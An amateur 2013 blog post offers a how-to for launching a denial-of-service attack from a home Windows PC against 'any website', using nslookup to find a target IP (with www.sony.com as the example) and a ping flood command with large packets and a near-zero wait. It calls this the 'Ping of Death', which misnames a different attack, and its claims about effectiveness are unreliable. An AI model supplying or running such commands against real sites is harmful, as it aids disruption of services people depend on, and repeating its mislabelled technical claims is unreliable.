Tuesday 1 October 2013

Configuring Dos Attack (PING OF DEATH)

hardeep mann  /  at  01:39  /  No comments


DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

DoS Attack Stands For Denial of Service Attack

What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

No problem.. here is the solution..
open ur CMD (command prompt).. and type
nslookup Site-Name
(e.g nslookup www.sony.com)

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

PING [options] destination_host

-w timeout Timeout in milliseconds to wait for each reply.
-i TTL Time To Live.
-v TOS Type Of Service.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-t Ping the destination host until interrupted.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host_list Loose source route along host_list.
-k host_list Strict source route along host_list.
destination_host The name of the remote hostA response of "Request timed out" means there was no response to the ping attempt in the default time period of one second.
If the latency of the response is more than one second. Use the -w option on the ping command to increase the time-out. For example, to allow responses within five seconds, use ping -w 5000.

This All System Is Known As "PING OF DEATH"

Posted in: Posted on: Tuesday 1 October 2013


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